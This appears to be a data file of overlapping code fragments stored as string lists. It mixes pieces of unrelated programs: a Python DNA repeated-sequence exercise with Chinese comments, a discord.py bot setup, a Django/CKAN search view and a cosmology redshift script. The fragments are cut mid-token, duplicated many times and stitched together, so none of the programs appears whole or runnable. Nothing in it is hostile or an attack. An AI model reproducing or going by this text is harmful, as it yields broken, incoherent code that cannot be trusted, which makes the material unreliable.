中出现次数超过一次 **test case** >>>", "\"\"\" 所有的DNA都是由一系列缩写为`A`, `C`, `G`, `T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case**", "iterate over all sequences of length for start in range(n - length +", "if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA", "findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] #", "of length for start in range(n - length + 1): tmp = sequence[start:start", "s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The", "\"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set() output = set()", "= len(sequence) seen = set() output = set() # iterate over all sequences", "n = len(sequence) seen = set() output = set() # iterate over all", "print(f\"For input DNA string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For", "sequences of length for start in range(n - length + 1): tmp =", "== '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\"", "in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT'", "'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\")", "= set() output = set() # iterate over all sequences of length for", "- length + 1): tmp = sequence[start:start + length] if tmp in seen:", "= 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口,", "len(sequence) seen = set() output = set() # iterate over all sequences of", "= 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The Repeated", "length): n = len(sequence) seen = set() output = set() # iterate over", "['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\"" ]
[ "the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and load all", "import os class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the current prefix", "Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the current prefix in the guild", "= \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents =", "os class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the current prefix in", "the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot", "\"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default()", "message): \"\"\"Fetches the current prefix in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx", "from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and load", "commands import discord import yaml import os class Bot(commands.Bot): async def get_prefix(self, bot,", "import discord import yaml import os class Bot(commands.Bot): async def get_prefix(self, bot, message):", "extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix", "open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix,", "super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") #", "yaml import os class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the current", "commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\",", "= Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async def check(ctx): return", ") client = Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async def", "from discord.ext import commands import discord import yaml import os class Bot(commands.Bot): async", "Load the debugging cog. @client.check async def check(ctx): return True token = os.getenv(\"TOKEN\")", "\") def __init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding", "current prefix in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self):", "as f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() )", "def get_prefix(self, bot, message): \"\"\"Fetches the current prefix in the guild from the", "discord import yaml import os class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches", "\"\"\"Initialize the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as", "the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f:", "load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f)", "yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\")", "client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async def check(ctx): return True token", "the current prefix in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def", "self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() ) client =", "command_prefix = self.get_prefix, intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load", "__init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\")", "client = Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async def check(ctx):", "return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\" with", "all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__(", "def __init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding =", "bot, message): \"\"\"Fetches the current prefix in the guild from the database.\"\"\" return", "prefix in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize", "and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config =", "discord.ext import commands import discord import yaml import os class Bot(commands.Bot): async def", "the debugging cog. @client.check async def check(ctx): return True token = os.getenv(\"TOKEN\") client.run(token)", "f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() ) client", "= discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check", "\"\"\"Fetches the current prefix in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \")", "Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async def check(ctx): return True", "import commands import discord import yaml import os class Bot(commands.Bot): async def get_prefix(self,", "in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the", "bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config", "async def get_prefix(self, bot, message): \"\"\"Fetches the current prefix in the guild from", "with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix =", "import yaml import os class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the", "database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\"", "# Load the debugging cog. @client.check async def check(ctx): return True token =", "encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents", "class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the current prefix in the", "= yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() ) client = Bot()", "= self.get_prefix, intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load the", "self.get_prefix, intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load the debugging", "intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load the debugging cog.", "guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and", "get_prefix(self, bot, message): \"\"\"Fetches the current prefix in the guild from the database.\"\"\"", "discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async" ]
[ "google.students() total = response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url", "request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else: response = google.students() total", "response = google.students() total = response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size +", "[{'number': n, 'url': change_url(n), 'active': n == actual_page} for n in range(1, pages_count)]", "= { \"pages\": pages, \"prev\": actual_page > 1, \"next\": actual_page < pages_count, }", "n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url': change_url(n), 'active':", "..ckan_model import production as ckan import django.http def index(request: django.http.HttpRequest): payload = {}", "as ckan import django.http def index(request: django.http.HttpRequest): payload = {} google = ckan.Search()", "1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4]", "ckan import django.http def index(request: django.http.HttpRequest): payload = {} google = ckan.Search() payload['top_tags']", "def search(request: django.http.HttpRequest): # it's a search engine! google = ckan.Search() payload =", "payload = {} payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1))", "= (page - 1) * page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos,", "start_pos = (page - 1) * page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'),", "options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url':", "pages, \"prev\": actual_page > 1, \"next\": actual_page < pages_count, } payload['results'] = response['results']", "urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url': change_url(n), 'active': n == actual_page} for n", "= list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options)", "as ckan from ckan_model import production as ckan #from ..ckan_model import production as", "ckan_model import stub as ckan from ckan_model import production as ckan #from ..ckan_model", "= response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path()))", "production as ckan import django.http def index(request: django.http.HttpRequest): payload = {} google =", "payload['top_tags'] = google.top_tags() return render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest): # it's a", "= {} payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1)) page_size", "import production as ckan #from ..ckan_model import production as ckan import django.http def", "1, \"next\": actual_page < pages_count, } payload['results'] = response['results'] return render(request, 'search.html', payload)", "'index.html', context=payload) def search(request: django.http.HttpRequest): # it's a search engine! google = ckan.Search()", "dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages =", "django.shortcuts import render #from ckan_model import stub as ckan from ckan_model import production", "= n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url': change_url(n),", "google.university_list() page = int(request.GET.get('page', 1)) page_size = 10 start_pos = (page - 1)", "change_url(n), 'active': n == actual_page} for n in range(1, pages_count)] payload[\"pagination\"] = {", "parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4] =", "ckan #from ..ckan_model import production as ckan import django.http def index(request: django.http.HttpRequest): payload", "\"pages\": pages, \"prev\": actual_page > 1, \"next\": actual_page < pages_count, } payload['results'] =", "page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else: response =", "google.top_tags() return render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest): # it's a search engine!", "'url': change_url(n), 'active': n == actual_page} for n in range(1, pages_count)] payload[\"pagination\"] =", "from django.shortcuts import render #from ckan_model import stub as ckan from ckan_model import", "context=payload) def search(request: django.http.HttpRequest): # it's a search engine! google = ckan.Search() payload", "{ \"pages\": pages, \"prev\": actual_page > 1, \"next\": actual_page < pages_count, } payload['results']", "as ckan #from ..ckan_model import production as ckan import django.http def index(request: django.http.HttpRequest):", "urllib.parse from django.shortcuts import render #from ckan_model import stub as ckan from ckan_model", "def change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number':", "production as ckan #from ..ckan_model import production as ckan import django.http def index(request:", "= [{'number': n, 'url': change_url(n), 'active': n == actual_page} for n in range(1,", "django.http def index(request: django.http.HttpRequest): payload = {} google = ckan.Search() payload['top_tags'] = google.top_tags()", "ckan from ckan_model import production as ckan #from ..ckan_model import production as ckan", "return render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest): # it's a search engine! google", "= google.university_list() page = int(request.GET.get('page', 1)) page_size = 10 start_pos = (page -", "ckan.Search() payload = {} payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page',", "payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1)) page_size = 10", "= google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1)) page_size = 10 start_pos", "actual_page} for n in range(1, pages_count)] payload[\"pagination\"] = { \"pages\": pages, \"prev\": actual_page", "== actual_page} for n in range(1, pages_count)] payload[\"pagination\"] = { \"pages\": pages, \"prev\":", "= total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4]))", "google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1)) page_size = 10 start_pos =", "'active': n == actual_page} for n in range(1, pages_count)] payload[\"pagination\"] = { \"pages\":", "#from ckan_model import stub as ckan from ckan_model import production as ckan #from", "django.http.HttpRequest): payload = {} google = ckan.Search() payload['top_tags'] = google.top_tags() return render(request, 'index.html',", "= dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages", "engine! google = ckan.Search() payload = {} payload['tags'] = google.tags_list() payload['unis'] = google.university_list()", "response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options", "search engine! google = ckan.Search() payload = {} payload['tags'] = google.tags_list() payload['unis'] =", "start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] =", "+ 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n", "in range(1, pages_count)] payload[\"pagination\"] = { \"pages\": pages, \"prev\": actual_page > 1, \"next\":", "google = ckan.Search() payload = {} payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page", "rows=page_size ) else: response = google.students() total = response['total'] pages_count = total//10+bool(total%10) actual_page", "from ckan_model import production as ckan #from ..ckan_model import production as ckan import", "range(1, pages_count)] payload[\"pagination\"] = { \"pages\": pages, \"prev\": actual_page > 1, \"next\": actual_page", "import urllib.parse from django.shortcuts import render #from ckan_model import stub as ckan from", "= 10 start_pos = (page - 1) * page_size if request.GET: response =", "pages = [{'number': n, 'url': change_url(n), 'active': n == actual_page} for n in", "= google.top_tags() return render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest): # it's a search", "{} google = ckan.Search() payload['top_tags'] = google.top_tags() return render(request, 'index.html', context=payload) def search(request:", "page = int(request.GET.get('page', 1)) page_size = 10 start_pos = (page - 1) *", "= ckan.Search() payload = {} payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page =", "if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else: response = google.students()", "start=start_pos, rows=page_size ) else: response = google.students() total = response['total'] pages_count = total//10+bool(total%10)", "render #from ckan_model import stub as ckan from ckan_model import production as ckan", "pages_count = total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options =", "n, 'url': change_url(n), 'active': n == actual_page} for n in range(1, pages_count)] payload[\"pagination\"]", "= start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page']", "it's a search engine! google = ckan.Search() payload = {} payload['tags'] = google.tags_list()", "request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else: response = google.students() total = response['total'] pages_count =", "response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else: response = google.students() total =", "> 1, \"next\": actual_page < pages_count, } payload['results'] = response['results'] return render(request, 'search.html',", "total = response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url =", "parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url': change_url(n), 'active': n", "n in range(1, pages_count)] payload[\"pagination\"] = { \"pages\": pages, \"prev\": actual_page > 1,", "10 start_pos = (page - 1) * page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'),", "1)) page_size = 10 start_pos = (page - 1) * page_size if request.GET:", "= ckan.Search() payload['top_tags'] = google.top_tags() return render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest): #", "urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url': change_url(n), 'active': n == actual_page}", "search(request: django.http.HttpRequest): # it's a search engine! google = ckan.Search() payload = {}", "#from ..ckan_model import production as ckan import django.http def index(request: django.http.HttpRequest): payload =", "def index(request: django.http.HttpRequest): payload = {} google = ckan.Search() payload['top_tags'] = google.top_tags() return", "google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else: response = google.students() total = response['total'] pages_count", "import render #from ckan_model import stub as ckan from ckan_model import production as", "payload[\"pagination\"] = { \"pages\": pages, \"prev\": actual_page > 1, \"next\": actual_page < pages_count,", "ckan_model import production as ckan #from ..ckan_model import production as ckan import django.http", "list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return", "= google.students() total = response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size + 1", "import stub as ckan from ckan_model import production as ckan #from ..ckan_model import", "= urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url': change_url(n), 'active': n ==", "* page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else: response", "pages_count)] payload[\"pagination\"] = { \"pages\": pages, \"prev\": actual_page > 1, \"next\": actual_page <", "= google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else: response = google.students() total = response['total']", "google = ckan.Search() payload['top_tags'] = google.top_tags() return render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest):", "payload['unis'] = google.university_list() page = int(request.GET.get('page', 1)) page_size = 10 start_pos = (page", "n == actual_page} for n in range(1, pages_count)] payload[\"pagination\"] = { \"pages\": pages,", "stub as ckan from ckan_model import production as ckan #from ..ckan_model import production", "{} payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1)) page_size =", "ckan.Search() payload['top_tags'] = google.top_tags() return render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest): # it's", "- 1) * page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size )", "actual_page = start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n):", "change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number': n,", "a search engine! google = ckan.Search() payload = {} payload['tags'] = google.tags_list() payload['unis']", "int(request.GET.get('page', 1)) page_size = 10 start_pos = (page - 1) * page_size if", "page_size = 10 start_pos = (page - 1) * page_size if request.GET: response", "actual_page > 1, \"next\": actual_page < pages_count, } payload['results'] = response['results'] return render(request,", "(page - 1) * page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size", "= int(request.GET.get('page', 1)) page_size = 10 start_pos = (page - 1) * page_size", "for n in range(1, pages_count)] payload[\"pagination\"] = { \"pages\": pages, \"prev\": actual_page >", "import django.http def index(request: django.http.HttpRequest): payload = {} google = ckan.Search() payload['top_tags'] =", "index(request: django.http.HttpRequest): payload = {} google = ckan.Search() payload['top_tags'] = google.top_tags() return render(request,", "= {} google = ckan.Search() payload['top_tags'] = google.top_tags() return render(request, 'index.html', context=payload) def", "payload = {} google = ckan.Search() payload['top_tags'] = google.top_tags() return render(request, 'index.html', context=payload)", "total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def", "# it's a search engine! google = ckan.Search() payload = {} payload['tags'] =", "\"prev\": actual_page > 1, \"next\": actual_page < pages_count, } payload['results'] = response['results'] return", "django.http.HttpRequest): # it's a search engine! google = ckan.Search() payload = {} payload['tags']", "import production as ckan import django.http def index(request: django.http.HttpRequest): payload = {} google", "options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url)", "else: response = google.students() total = response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size", "render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest): # it's a search engine! google =", "return urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url': change_url(n), 'active': n == actual_page} for", ") else: response = google.students() total = response['total'] pages_count = total//10+bool(total%10) actual_page =", "1) * page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else:" ]
[ "= Redshift(0.84, 2.07, -0.7, z=z) Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k')", "dz = z[1] - z[0] E = Efunc(z) Eics = np.zeros(E.shape) for i", "z1) + rbrk * Rhigh * (z > z1) R *= n0 /", "> z1) R *= n0 / R[0] return z, R z, R =", "= np.power((1.0 + z1), n1 - n2) R = Rlow * (z <=", "#Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall = Eics / E; z =", "+ z), n2) rbrk = np.power((1.0 + z1), n1 - n2) R =", "/ E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall = Eics", "n2) rbrk = np.power((1.0 + z1), n1 - n2) R = Rlow *", "z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d", "R = Rlow * (z <= z1) + rbrk * Rhigh * (z", "#plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z dz'/E(z') and saves to file", "Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics", "/ E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall =", "Omega_m = 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1 + z),", "= np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda) return E def Efuncinv(z):", "Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] - z[0] E = Efunc(z) Eics", "z), n2) rbrk = np.power((1.0 + z1), n1 - n2) R = Rlow", "+ z1), n1 - n2) R = Rlow * (z <= z1) +", "np.power((1 + z), 3) + Omega_lambda) return E def Efuncinv(z): return 1.0 /", "Redshift(0.84, 2.07, -0.7, z=z) Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b')", "0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1] #Eics[0]", "and saves to file def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E", "Rhigh = np.power((1.0 + z), n2) rbrk = np.power((1.0 + z1), n1 -", "d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp =", "(z <= z1) + rbrk * Rhigh * (z > z1) R *=", "matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 +", "dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall = Eics / E; z", "z), n1) Rhigh = np.power((1.0 + z), n2) rbrk = np.power((1.0 + z1),", "Rlow * (z <= z1) + rbrk * Rhigh * (z > z1)", "z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh = np.power((1.0 + z), n2)", "from scipy.integrate import quad import matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6,", "= Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z)", "R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show()", "R *= n0 / R[0] return z, R z, R = Redshift(0.84, 2.07,", "import numpy as np from scipy.integrate import quad import matplotlib.pyplot as plt def", "- n2) R = Rlow * (z <= z1) + rbrk * Rhigh", "Rlow = np.power((1.0 + z), n1) Rhigh = np.power((1.0 + z), n2) rbrk", "* (z <= z1) + rbrk * Rhigh * (z > z1) R", "saves to file def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E =", "= np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp = R", "<= z1) + rbrk * Rhigh * (z > z1) R *= n0", "(z > z1) R *= n0 / R[0] return z, R z, R", "= 0 Eall = Eics / E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1)", "z1), n1 - n2) R = Rlow * (z <= z1) + rbrk", "z[0] E = Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i] =", "Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b') plt.plot(z,Eall,'-.r') #plt.plot(z,np.cumsum(Eall),'-g') plt.xlabel(r'$z$') plt.grid()", "z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh = np.power((1.0 + z),", "def Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] -", "plt.show() #### This computes E(z) and int_0^z dz'/E(z') and saves to file def", "Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] - z[0]", "np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall =", "*= n0 / R[0] return z, R z, R = Redshift(0.84, 2.07, -0.7)", "= Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84,", "= Rlow * (z <= z1) + rbrk * Rhigh * (z >", "E def Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1]", "= np.power((1.0 + z), n1) Rhigh = np.power((1.0 + z), n2) rbrk =", "z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() ####", "0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1 + z), 3) +", "- z[0] E = Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i]", "plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1)", "(quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = 